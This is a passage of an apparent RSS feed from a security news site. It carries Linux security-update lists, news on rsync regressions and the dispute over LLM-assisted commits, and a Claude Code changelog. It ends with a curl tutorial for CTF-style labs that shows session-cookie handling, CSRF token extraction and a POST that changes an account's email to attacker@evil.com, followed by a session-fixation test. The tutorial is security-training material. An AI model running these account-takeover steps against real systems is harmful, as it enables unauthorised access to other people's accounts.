<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (bind and libyang), <b>Debian</b> (keystone and openssl), <b>Fedora</b> (mingw-objfw, objfw, sentencepiece, and tailscale), <b>Mageia</b> (packagekit and suricata), <b>Oracle</b> (bind, bind9.16, go-toolset:ol8, ImageMagick, kernel, samba, and vim), <b>SUSE</b> (apache-commons-lang3, apache-commons-text, apache-commons- configuration2, apache-commons-cli, apache-commons-io, apache-commons-codec, avahi, busybox, chromedriver, chromium, csync2, firewalld, frr, gleam, helm, kernel-devel, keybase-client, libmozjs-140-0, libopenvswitch-3_7-0, libsoup, memcached, mutt, openjpeg2, ovmf, perl-HTML-Parser, perl-Net-CIDR-Set, perl-Protocol-HTTP2, postgresql-jdbc, postgresql17, python-CairoSVG, python-Flask, python-pip, python-pyOpenSSL, python-python-multipart, python-Twisted, python-urllib3, python-urllib3_1, python-uv, python311, rsync, tomcat, and tree-sitter), and <b>Ubuntu</b> (alsa-lib, cups, inetutils, isc-kea, jpeg-xl, libnet-cidr-lite-perl, netatalk, netty, nginx, node-shell-quote, php-twig, pillow, poppler, rsync, strongswan, systemd, and transmission).]]></content:encoded>
</item>
<item>
<title><![CDATA[deepin 25.1.1 Update]]></title>
<description><![CDATA[Learn more about deepin on DistroWatch: https://distrowatch.com/table.php?distribution=deepin The deepin 25.1.1 update is here! This update brings comprehensive optimizations in system security, hardware compatibility, desktop experience, AI capabilities, and more, including multiple feature impr...]]></description>
<link>https://tsecurity.de/de/3583559/unix-server/deepin-2511-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583559/unix-server/deepin-2511-update/</guid>
<pubDate>Tue, 09 Jun 2026 07:30:53 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn more about deepin on DistroWatch: https://distrowatch.com/table.php?distribution=deepin The deepin 25.1.1 update is here! This update brings comprehensive optimizations in system security, hardware compatibility, desktop experience, AI capabilities, and more, including multiple feature improvements, bug fixes, and CVE vulnerability patches. We recommend upgrading as soon as possible via Control Center → System Update, or by using the terminal command: sudo apt update &amp;&amp; sudo apt dist-upgrade   I. deepin 25.1.1 Release Notes Security Fixes Fixed high‑risk vulnerabilities including CVE‑2026‑6276 (curl cookie leak), systemd, and CVE‑2026‑35385 (OpenSSH). Addressed security issues in components such as inetutils, gnutls28, xorg-server, mesa, glibc, rsync, nginx, and wireshark. Fixed vulnerabilities in open‑source components including jpeg-xl, wget2, pillow, libexif, python-ldap, and ...<a href="https://www.deepin.org/en/deepin-25-1-1-released/">Read more</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3583495/unix-server/security-mehrere-probleme-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583495/unix-server/security-mehrere-probleme-in-rsync-suse/</guid>
<pubDate>Tue, 09 Jun 2026 06:46:05 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[rsync 3.4.4 released with regression fixes]]></title>
<description><![CDATA[rsync recently garnered controversy due to regressions introduced in the last release (3.4.3). Many people (rightly or wrongly) have attributed these regressions to the use of LLM tools. This most recent release claims to fix those regressions. Based on the rsync changelog, it was around ~20 days...]]></description>
<link>https://tsecurity.de/de/3583324/linux-tipps/rsync-344-released-with-regression-fixes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583324/linux-tipps/rsync-344-released-with-regression-fixes/</guid>
<pubDate>Tue, 09 Jun 2026 04:10:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>rsync recently <a href="https://lwn.net/Articles/1076040/">garnered controversy</a> due to regressions introduced in the last release (3.4.3). Many people (rightly or wrongly) have attributed these regressions to the use of LLM tools. This most recent release claims to fix those regressions. Based on the <a href="https://rsync.samba.org/">rsync changelog</a>, it was around ~20 days between releases - which I think is pretty good turn around. rsync is adding more tests to the upcoming 3.5 release to hopefully avoid these types of issues in the future. It's not clear if those tests are written using LLM tools.</p> <p>Many people expressed a desire to move to rsync alternatives. Apparently, there's even a complete <a href="https://github.com/oferchen/rsync">Rust reimplementation</a> that claims to be wire-compatible. I wonder if any of these alternatives will take off? Or if most people will stick with the original rsync implementation? </p> <p>Unless Ubuntu decides to swap C rsync for Rust rsync (similar to how they're swapping C coreutils for Rust coreutils), I suspect most distros will stick with the original rsync. I personally have enjoyed using rsync. I think the current controversy will probably be forgotten in a years time.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/lustre-fan"> /u/lustre-fan </a> <br> <span><a href="https://lwn.net/Articles/1076989/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1u0nyvl/rsync_344_released_with_regression_fixes/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (Ubuntu)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3582991/unix-server/security-mehrere-probleme-in-rsync-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582991/unix-server/security-mehrere-probleme-in-rsync-ubuntu/</guid>
<pubDate>Mon, 08 Jun 2026 23:46:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8349-2: rsync regression]]></title>
<description><![CDATA[USN-8349-1 fixed vulnerabilities in rsync. The update introduced multiple
regressions in rsync functionality. This update fixes the problem.

Original advisory details:

 Calum Hutton discovered that rsync contained a heap-based out-of-bounds
 read when handling file transfers. A remote attacker ...]]></description>
<link>https://tsecurity.de/de/3582440/unix-server/usn-8349-2-rsync-regression/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582440/unix-server/usn-8349-2-rsync-regression/</guid>
<pubDate>Mon, 08 Jun 2026 20:15:50 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[USN-8349-1 fixed vulnerabilities in rsync. The update introduced multiple
regressions in rsync functionality. This update fixes the problem.

Original advisory details:

 Calum Hutton discovered that rsync contained a heap-based out-of-bounds
 read when handling file transfers. A remote attacker with read access
 to an rsync server could possibly use this issue to cause a denial of
 service. (CVE-2025-10158)

 Batuhan Sancak, Damien Neil, and Michael Stapelberg discovered that
 rsync daemons configured without chroot protection were exposed to a
 race condition on parent path components. A local attacker with write
 access to a module could possibly use this issue to overwrite files,
 obtain sensitive information, or escalate privileges.
 (CVE-2026-29518)

 It was discovered that rsync did not properly validate a length value
 while sorting extended attributes. An attacker could possibly use this
 issue to cause a denial of service. (CVE-2026-41035)

 It was discovered that rsync performed reverse-DNS lookups after
 chrooting in some daemon configurations. A remote attacker could
 possibly use this issue to bypass hostname-based access controls and
 access network services. (CVE-2026-43617)

 Omar Elsayed discovered that rsync did not properly check for integer
 overflows while decoding compressed tokens. A remote attacker could
 possibly use this issue to obtain sensitive information.
 (CVE-2026-43618)

 Andrew Tridgell discovered that rsync did not fully fix a symlink race
 condition in path-based system calls for daemons configured without
 chroot protection. A local attacker could possibly use this issue to
 overwrite files, obtain sensitive information, or escalate privileges.
 (CVE-2026-43619)

 Pratham Gupta discovered that rsync did not properly validate an index
 while processing file lists. A remote attacker could possibly use this
 issue to cause rsync to crash, resulting in a denial of service.
 (CVE-2026-43620)

 Michal Ruprich discovered that rsync contained an off-by-one error
 while handling HTTP proxy responses. An attacker able to intercept network
 communications or a malicious proxy server could possibly use this issue to
 cause a denial of service. (CVE-2026-45232)]]></content:encoded>
</item>
<item>
<title><![CDATA[rsync 3.4.4 released with regression fixes]]></title>
<description><![CDATA[Andrew Tridgell has announced
the release of rsync 3.4.4 with
fixes for the regressions introduced in the 3.4.3 release. He also
notes there will be an rsync 3.5.0 soon, with many more security
updates:


As part of the 3.5.0 release update I have created a
rsync-security@lists.samba.org mailing ...]]></description>
<link>https://tsecurity.de/de/3581754/linux-tipps/rsync-344-released-with-regression-fixes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581754/linux-tipps/rsync-344-released-with-regression-fixes/</guid>
<pubDate>Mon, 08 Jun 2026 16:24:42 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Andrew Tridgell has <a href="https://lwn.net/ml/all/CAAbv5GYjCWdvALZHZ5B-ep4p7tvMDYrQWKexjM2fLM%2BhtGyVGg%40mail.gmail.com/">announced</a>
the release of <a href="https://rsync.samba.org/">rsync</a> 3.4.4 with
fixes for the regressions introduced in the 3.4.3 release. He also
notes there will be an rsync 3.5.0 soon, with many more security
updates:</p>

<blockquote class="bq">
<p>As part of the 3.5.0 release update I have created a
rsync-security@lists.samba.org mailing list for anyone who is willing
to do testing of the 3.5.0 release. The idea is to try to reduce the
chance of more regressions by expanding the set of testers of this
release. I have seeded it with people who were involved in past rsync
security issues. If you want to join this list then the easiest way
would be for you to be vouched for by someone on the
distros@vs.openwall.org list or someone else I already trust.</p>

<p>My apologies for the regressions in the 3.4.3 release and I hope future
security updates for rsync will have less issues. The greatly expanded test
suite in rsync 3.5 combined with the rsync-security mailing list should
help.</p>
</blockquote>
<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.163]]></title>
<description><![CDATA[What's changed

Added requiredMinimumVersion and requiredMaximumVersion managed settings — Claude Code refuses to start if its version is outside the allowed range and directs the user to an approved version
Added /plugin list command to list installed plugins, with --enabled/--disabled filters
A...]]></description>
<link>https://tsecurity.de/de/3573977/downloads/v21163/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573977/downloads/v21163/</guid>
<pubDate>Fri, 05 Jun 2026 00:01:23 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>requiredMinimumVersion</code> and <code>requiredMaximumVersion</code> managed settings — Claude Code refuses to start if its version is outside the allowed range and directs the user to an approved version</li>
<li>Added <code>/plugin list</code> command to list installed plugins, with <code>--enabled</code>/<code>--disabled</code> filters</li>
<li>Added a "c to copy" shortcut to <code>/btw</code> that copies the raw markdown answer to the clipboard, preserving formatting when pasted elsewhere</li>
<li>Hooks: Stop and SubagentStop hooks can now return <code>hookSpecificOutput.additionalContext</code> to give Claude feedback and keep the turn going without being labeled a hook error</li>
<li>Skills: added <code>\$</code> escape syntax to include a literal <code>$</code> before a digit in command bodies</li>
<li>stdio MCP servers now receive the same <code>CLAUDE_CODE_SESSION_ID</code> as hooks/Bash on <code>--resume</code></li>
<li>Fixed <code>claude -p</code> hanging forever after its final result when a backgrounded command never exits — background shells are now stopped ~5s after the result once stdin closes</li>
<li>Fixed <code>claude -p</code> failing with "ANTHROPIC_API_KEY required" on Bedrock/Vertex/Foundry when <code>CI=true</code> and no Anthropic API key is set</li>
<li>Fixed bash commands failing under bazel and EDR-protected Go workflows: <code>$TMPDIR</code> was overridden to <code>/tmp/claude-{uid}</code> for all commands instead of only sandboxed ones (regression in 2.1.154)</li>
<li>Fixed Bash commands failing on Windows with "EEXIST: file already exists" on the session-env directory when it has the read-only attribute or is inside OneDrive</li>
<li>Fixed org-managed permission rules not applying for the entire session when the managed settings fetch completed during startup on a fresh config directory</li>
<li>Fixed background sessions in <code>claude agents</code> losing their running background tasks when reattached after a Claude Code update</li>
<li>Fixed terminal misalignment and a multi-second hang when exiting the agent view by pressing Esc</li>
<li>Fixed clicking Stop on a background-task chip in the desktop app not clearing the chip when the underlying process was already gone</li>
<li>Fixed keyboard input becoming permanently unresponsive after a paste operation whose end marker is dropped by the terminal</li>
<li>Fixed hook <code>if: "Bash(...)"</code> conditions firing on every Bash command containing <code>$()</code> or <code>$VAR</code>; the pattern now matches against commands inside subshells and backticks too</li>
<li>Fixed deny rules on home-directory paths (e.g. <code>Read(~/Desktop/**)</code>) not blocking Bash commands that reference the path via <code>$HOME</code></li>
<li>Fixed a stray "(no content)" line left in the transcript after closing panel dialogs like /mcp and /plugins</li>
<li>Background agent sessions now update to a new Claude Code version in the background, so opening a session after an update no longer waits on a cold restart</li>
<li>Clearer descriptions for built-in commands and skills in the / menu</li>
<li>The subscription-switch suggestion now shows in the startup announcement slot instead of a toast</li>
<li><code>claude agents</code> dispatching from the state-grouped view now starts the session in the directory the agent view was opened from</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA['Please do not vibe f$%& up this software': Broken backups spark AI coding row in rsync project]]></title>
<description><![CDATA[Users probe backup failures find Claude-assisted commits. Veteran engineer retorts: "I did not just vibe-code 'convert test suite to python'."]]></description>
<link>https://tsecurity.de/de/3572846/it-nachrichten/please-do-not-vibe-f-up-this-software-broken-backups-spark-ai-coding-row-in-rsync-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572846/it-nachrichten/please-do-not-vibe-f-up-this-software-broken-backups-spark-ai-coding-row-in-rsync-project/</guid>
<pubDate>Thu, 04 Jun 2026 16:02:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Users probe backup failures find Claude-assisted commits. Veteran engineer retorts: "I did not just vibe-code 'convert test suite to python'."]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, compat-openssl10, compat-openssl11, delve, expat, httpd:2.4, libexif, mod_http2, openssl, ruby4.0, samba, thunderbird, unbound, and vim), Debian (ceph and sudo), Fedora (libsoup3, pie, roundcubemail, and xorg-x11-server-Xwayland), Mageia ...]]></description>
<link>https://tsecurity.de/de/3572733/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572733/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 04 Jun 2026 15:23:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, compat-openssl10, compat-openssl11, delve, expat, httpd:2.4, libexif, mod_http2, openssl, ruby4.0, samba, thunderbird, unbound, and vim), <b>Debian</b> (ceph and sudo), <b>Fedora</b> (libsoup3, pie, roundcubemail, and xorg-x11-server-Xwayland), <b>Mageia</b> (lxc), <b>Oracle</b> (expat, gnutls, kernel, php:8.2, thunderbird, and uek-kernel), <b>Slackware</b> (httpd, net, proftpd, tigervnc, and xorg), <b>SUSE</b> (apache-sshd, apptainer, atril, bind, busybox, cloudflared, evolution-data-server, golang-github-prometheus-prometheus, golang-github-v2fly-v2ray-core, grafana, helm, kernel, libgphoto2-6, libjxl-devel, libsoup, libsoup-2_4-1, libsoup-3_0-0, memcached, ovmf, python-cairosvg, python-flask, python-pip, python-pymupdf, python-pyOpenSSL, python-urllib3, python-urllib3_1, python3-pyOpenSSL, restic, rsync, salt, sdbootutil, tor, tree-sitter, vorbis-tools, and yq), and <b>Ubuntu</b> (exim4, frr, gst-plugins-base1.0, libtemplate-perl, libwww-perl, mysql-8.0, nginx, python-pip, python-urllib3, and twisted).]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] LWN.net Weekly Edition for June 4, 2026]]></title>
<description><![CDATA[Inside this week's LWN.net Weekly Edition:
        
        
 Front: MeshCore; x32 ABI; Open-source security; Package-manager metadata; More LSFMM+BPF coverage; Loadable crypto module.
             Briefs: Lightwell; jqwik protestware; RedHat package compromise; DistroWatch; Fedora election; Rust...]]></description>
<link>https://tsecurity.de/de/3571248/linux-tipps/lwnnet-weekly-edition-for-june-4-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571248/linux-tipps/lwnnet-weekly-edition-for-june-4-2026/</guid>
<pubDate>Thu, 04 Jun 2026 03:54:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Inside this week's LWN.net Weekly Edition:
        <p>
        </p><ul>
<li> <a href="https://lwn.net/Articles/1074950/">Front</a>: MeshCore; x32 ABI; Open-source security; Package-manager metadata; More LSFMM+BPF coverage; Loadable crypto module.
            </li><li> <a href="https://lwn.net/Articles/1074952/">Briefs</a>: Lightwell; jqwik protestware; RedHat package compromise; DistroWatch; Fedora election; Rust 1.96.0; rsync; Vim Classic 8.3; Quotes; ...
            </li><li> <a href="https://lwn.net/Articles/1074953/">Announcements</a>: Newsletters, conferences, security updates, patches, and more.
            </li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3570832/it-security-nachrichten/mehrere-probleme-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570832/it-security-nachrichten/mehrere-probleme-in-rsync-suse/</guid>
<pubDate>Wed, 03 Jun 2026 23:07:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Tridgell: rsync and outrage]]></title>
<description><![CDATA[Andrew Tridgell has written a blog
post responding to complaints that he has begun using LLM tools in
his work maintaining rsync:


Like many developers of open source packages I've been hit by a
flood of security reports lately in my role as the rsync
maintainer. Many of those reports are AI gen...]]></description>
<link>https://tsecurity.de/de/3569653/linux-tipps/tridgell-rsync-and-outrage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569653/linux-tipps/tridgell-rsync-and-outrage/</guid>
<pubDate>Wed, 03 Jun 2026 15:06:47 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Andrew Tridgell has written a <a href="https://medium.com/@tridge60/rsync-and-outrage-d9849599e5a0">blog
post</a> responding to complaints that he has begun using LLM tools in
his work maintaining <a href="https://rsync.samba.org/">rsync</a>:</p>

<blockquote class="bq">
<p>Like many developers of open source packages I've been hit by a
flood of security reports lately in my role as the rsync
maintainer. Many of those reports are AI generated (not all though,
there are some notable ones with very careful and high quality manual
analysis).</p>

<p>As this flood started to get more intense I realised I needed to
raise the defences on rsync a lot — we needed much more thorough test
suites, code coverage analysis, CI testing on a lot more platforms,
deliberate and thorough scanning for possible security issues (so I
find at least some of them before other people!) and the addition of a
whole lot of defence-in-depth hardening techniques.</p>

<p>[...] Now to the future, because we're not done yet by a long
shot. The security reports keep rolling in. I'm working on a bunch of
CVEs right now. Luckily I've been joined by some other very good
developers with great systems development skills and security
knowledge. Some of these people came to my attention partly because of
all the rage happening at the moment, so I get some rage storm clouds
have silver linings. Watch out for some credits for some great new
rsync developers in the next release.</p>
</blockquote>

<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Auth Mastery Part 2: Sessions, Cookies, and Staying Authenticated]]></title>
<description><![CDATA[Getting in once is easy. Staying in across ten requests is the skill.Series: curl — The Request Engine You Never Learned Properly Article: 6B of 16Article 6A got you authenticated. This article keeps you authenticated.A single authenticated request proves the credentials work. A multi-step attack...]]></description>
<link>https://tsecurity.de/de/3564980/hacking/auth-mastery-part-2-sessions-cookies-and-staying-authenticated/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3564980/hacking/auth-mastery-part-2-sessions-cookies-and-staying-authenticated/</guid>
<pubDate>Tue, 02 Jun 2026 07:20:13 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Getting in once is easy. Staying in across ten requests is the skill.</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uQUxe0sdnJIjg8Pfhhoqsg.png"></figure><blockquote><strong><em>Series:</em></strong><em> curl — The Request Engine You Never Learned Properly </em><strong><em>Article:</em></strong><em> 6B of 16</em></blockquote><p>Article 6A got you authenticated. This article keeps you authenticated.</p><p>A single authenticated request proves the credentials work. A multi-step attack workflow — login, enumerate, attack, extract — requires that authentication persist across every request. With a browser, this happens automatically. With curl, you manage it yourself.</p><p>This article covers cookie jars, session persistence, CSRF token handling, and OAuth2 flows. These are the stateful plumbing skills that every THM/HTB machine with a login page will require from you.</p><h3>How Sessions Work Over HTTP</h3><p>HTTP is stateless. Each request is independent — the server has no memory of previous requests by default.</p><p>Applications solve this with sessions: after a successful login, the server creates a session record and sends the client a session identifier in a Set-Cookie header. The client sends this identifier back with every subsequent request in the Cookie header. The server looks up the identifier and retrieves the session data.</p><p>Without a session cookie, every request you make after login is treated as a fresh, unauthenticated request.</p><p>With curl, you are responsible for capturing the session cookie from the login response and sending it with every subsequent request. The cookie jar system automates this.</p><h3>Cookie Jar Mechanics</h3><p>Two flags. Get the order right — beginners constantly reverse them.</p><p><strong>-c — Save cookies to a file (capture)</strong></p><pre>curl -c cookies.txt http://target.com/login</pre><p>-c appends any cookies from the server's Set-Cookie response headers into the file. This is the collection step.</p><p><strong>-b — Send cookies from a file (use)</strong></p><pre>curl -b cookies.txt http://target.com/dashboard</pre><p>-b reads cookies from the file and sends them in the Cookie header of the outgoing request. This is the authentication step.</p><p><strong>The memory rule:</strong> -c = <strong>c</strong>ollect. -b = <strong>b</strong>ring.</p><p><strong>Both together — the login and persist pattern:</strong></p><pre># Login: collect the session cookie<br>curl -s \<br>  -c cookies.txt \<br>  -d "username=admin&amp;password=password" \<br>  http://127.0.0.1:8080/login</pre><pre># Use the session on the next request<br>curl -s \<br>  -b cookies.txt \<br>  <a href="http://127.0.0.1:8080/dashboard">http://127.0.0.1:8080/dashboard</a></pre><pre>Login successful. Welcome, admin.</pre><pre>[Dashboard] Authenticated as: admin<br>Session active. You have access to protected resources.</pre><p>The first request hit the login endpoint, credentials matched, and the server issued a Set-Cookie header — -c wrote it to cookies.txt. The second request read that file with -b and sent the session token in the Cookie header. The server recognized it and returned authenticated content.</p><p><strong>Inspect what is in your cookie jar:</strong></p><pre>cat cookies.txt</pre><pre># Netscape HTTP Cookie File<br># https://curl.haxx.se/docs/http-cookies.html<br># This file was generated by libcurl! Edit at your own risk.<br>127.0.0.1	FALSE	/	FALSE	0	session	d52f6273029c4c769beeda5dfd618d34</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/854/1*7KGlSJTz-YHkYJpIfmW4hQ.png"><figcaption>Login with -c captures the session cookie. The dashboard confirms it works. cat cookies.txt shows what libcurl actually stored — domain, flags, expiry, and the token itself in Netscape format.</figcaption></figure><p>The cookie jar is plain text in the Netscape cookie format. Each data line is tab-separated with seven fields: domain, include-subdomains flag, path, secure flag, expiry timestamp, cookie name, and cookie value.</p><p>In this line: 127.0.0.1 is the domain. FALSE in the second field means the cookie does not apply to subdomains. FALSE in the fourth field means the Secure flag is not set. 0 In the fifth field means no expiry — a session cookie that lives until the server invalidates it or you delete the jar. session is the cookie name. The hex string is the token value the server will validate on every subsequent request.</p><p>Reading the jar tells you what session identifiers you have captured. Whether they are still valid, you find out only by using them — the jar itself does not track server-side session state.</p><h3>Session Persistence Across Multiple Requests</h3><p>A real attack workflow is not two requests — it is many. You need the session to persist across the entire chain.</p><p>Use the same cookie jar file for every request in the workflow:</p><pre># 1. Login<br>curl -s -c jar.txt -d "username=admin&amp;password=pass" http://target.com/login</pre><pre># 2. Enumerate users (authenticated endpoint)<br>curl -s -b jar.txt <a href="http://target.com/api/users">http://target.com/api/users</a></pre><pre># 3. Access target resource<br>curl -s -b jar.txt <a href="http://target.com/api/users/5/profile">http://target.com/api/users/5/profile</a></pre><pre># 4. Perform action<br>curl -s -b jar.txt \<br>  -X POST \<br>  -H "Content-Type: application/json" \<br>  -d '{"email":"attacker@evil.com"}' \<br>  <a href="http://target.com/api/users/5/email">http://target.com/api/users/5/email</a></pre><p>The same jar.txt file threads authentication through every step. One login, many requests.</p><p>If the session expires or the cookie is rejected, you will often see a redirect to the login page or a 401. When that happens:</p><ol><li>Delete the cookie jar: rm jar.txt</li><li>Re-run the login request</li><li>Continue from where the chain broke</li></ol><p><strong>Combining </strong><strong>-c and </strong><strong>-b for automatic cookie refresh:</strong></p><pre>curl -c jar.txt -b jar.txt http://127.0.0.1:8080/endpoint</pre><pre>==================================================<br>  curl Lab Echo Server<br>==================================================<br>METHOD       : GET<br>PATH         : /endpoint<br>FULL URL     : /endpoint<br>--- REQUEST HEADERS ---<br>  Host: 127.0.0.1:8080<br>  User-Agent: curl/7.68.0<br>  Accept: */*<br>--- QUERY STRING PARAMS ---<br>  (none)<br>--- RAW BODY ---<br>  (empty)<br>--- PARSED BODY PARAMS ---<br>  (none)<br>==================================================</pre><p>Using both flags simultaneously tells curl to send existing cookies from the jar and write any new cookies the server sends back. This handles session renewal — if the server rotates the session cookie mid-workflow, the jar is updated automatically. When the jar starts empty (as above), no Cookie header appears in the outgoing request. Once a login populates it, every subsequent combined-flag request both sends and refreshes.</p><h3>Set-Cookie Attributes and What They Mean for Your Testing</h3><p>When you inspect responses in verbose mode, you will see cookie attributes alongside the values. These affect both security posture and your testing approach.</p><pre>curl -v http://target.com/login -d "username=admin&amp;password=pass" 2&gt;&amp;1 | grep "Set-Cookie"</pre><pre>&lt; Set-Cookie: session=d52f6273029c4c769beeda5dfd618d34; Path=/</pre><p><strong>HttpOnly</strong> — The cookie cannot be accessed by JavaScript. This is a defense against XSS-based cookie theft. For your curl testing, it makes no difference — curl sends HTTP requests, not JavaScript. But if you find a stored XSS and the session cookie is HttpOnly, cookie theft via XSS is blocked.</p><p><strong>Secure</strong> — The cookie is only transmitted over HTTPS connections. If a cookie carries the Secure flag and you are testing over plain HTTP, it will not be sent — a common source of confusion in lab environments. One exception: curl treats http://localhost and http://127.0.0.1 as secure contexts and may still send Secure-flagged cookies there. Do not rely on that behavior when concluding production targets.</p><p><strong>SameSite</strong> — Controls when the cookie is sent on cross-origin requests. Strict means the cookie is only sent on same-origin requests. Lax allows some cross-origin requests (top-level navigation). None means the cookie is always sent — required for cross-origin use, but note that SameSite=None requires the Secure flag in modern browsers, and it enables CSRF if additional protections are absent.</p><p>A cookie without an SameSite attribute is treated as SameSite=Lax In modern browsers, the behavior that shifted in 2020 varies by browser version. Note this when cataloging cookies during recon.</p><h3>CSRF Token Extraction and Reuse</h3><p>Many web applications protect state-changing endpoints with CSRF tokens — session-tied values embedded in forms. When you submit a form, the server checks that the CSRF token in the request matches the one it issued. This prevents cross-site request forgery.</p><p>For curl-based testing, CSRF tokens are an obstacle: you cannot POST to a protected form endpoint without first fetching the valid token from the form page.</p><p>The workflow — use a single jar file throughout:</p><pre># Step 1: Authenticate and fetch the form page, extracting the CSRF token<br>CSRF=$(curl -s -c jar.txt -b jar.txt http://127.0.0.1:8080/settings | \<br>  grep -oP '(?&lt;=name="csrf_token" value=")[^"]*')</pre><pre>echo "CSRF token: $CSRF"</pre><pre>CSRF token: csrf_abc123xyz789_lab</pre><p>grep -oP uses Perl-compatible regex with a lookbehind to extract the token value. Note that -P (PCRE) requires GNU grep — it is standard on most Linux systems, but may not be available on BSD or macOS without installing grep separately. If grep -oP fails, grep -o 'value="[^"]*"' is a portable fallback that gets you close.</p><p>The pattern above assumes the form field looks like:</p><pre>&lt;input type="hidden" name="csrf_token" value="abc123xyz"&gt;</pre><p>Adjust the field name to match your target. Common names: csrf_token, _token, csrfmiddlewaretoken, authenticity_token. When in doubt, use grep -i csrf on the form HTML to find them.</p><p><strong>Step 2: Use the token in your request:</strong></p><pre>curl -s \<br>  -b jar.txt \<br>  -d "email=attacker@evil.com&amp;csrf_token=$CSRF" \<br>  http://127.0.0.1:8080/change-email</pre><pre>Email updated successfully.<br>User: admin<br>New email: attacker@evil.com</pre><p>The key insight: the CSRF token must come from the same session. The combined -c jar.txt -b jar.txt In step 1, both send the existing session cookie and capture any renewed cookie the server issues. Step 2 sends that same session back with the extracted token. The server validates that the CSRF token belongs to that session — a token from a different session will be rejected.</p><p><strong>Compact one-liner — for reference, not the recommended workflow:</strong></p><pre>curl -s -c jar.txt \<br>  -d "email=attacker@evil.com&amp;csrf_token=$(curl -s -c jar.txt -b jar.txt http://target.com/form | grep -oP '(?&lt;=csrf_token" value=")[^"]*')" \<br>  -b jar.txt \<br>  http://target.com/change-email</pre><p>This is the inline extraction pattern you will see in one-liner exploit scripts. It works, but it is brittle — a form field name change or encoding difference breaks the inner command silently and sends an empty token. Use the two-step version in any workflow you need to debug.</p><h3>Session Fixation Testing</h3><p>Session fixation is a vulnerability where an attacker forces a known session ID onto a victim before authentication, and the server preserves that same ID after login. Because the attacker already knows the ID, they can use it to access the now-authenticated session.</p><p>Test it with curl:</p><pre>curl -v \<br>  -b "PHPSESSID=attackercontrolledvalue" \<br>  http://10.48.179.222/cookie.php \<br>  -d "username=admin&amp;password=admin" 2&gt;&amp;1 | grep -E "Set-Cookie|HTTP/"</pre><pre>* using HTTP/1.x<br>&gt; POST /cookie.php HTTP/1.1<br>&lt; HTTP/1.1 200 OK</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/780/1*dnGSGvZVzFkwXpon9eNFIw.png"><figcaption>Session fixation test — a crafted PHPSESSID sent at login, output filtered to show only Set-Cookie and HTTP status lines. No new cookie in the response. The interpretation depends on the target's session mechanism — see the article for what each outcome means.</figcaption></figure><p>No Set-Cookie in the response. This particular target does not use PHP sessions — it uses a different session mechanism — so this result is not conclusive for fixation either way.</p><p>On a PHP application, the response tells you more. If you see:</p><pre>&lt; Set-Cookie: PHPSESSID=newrandomvalue; Path=/</pre><p>The server regenerated the session on login — the crafted value was 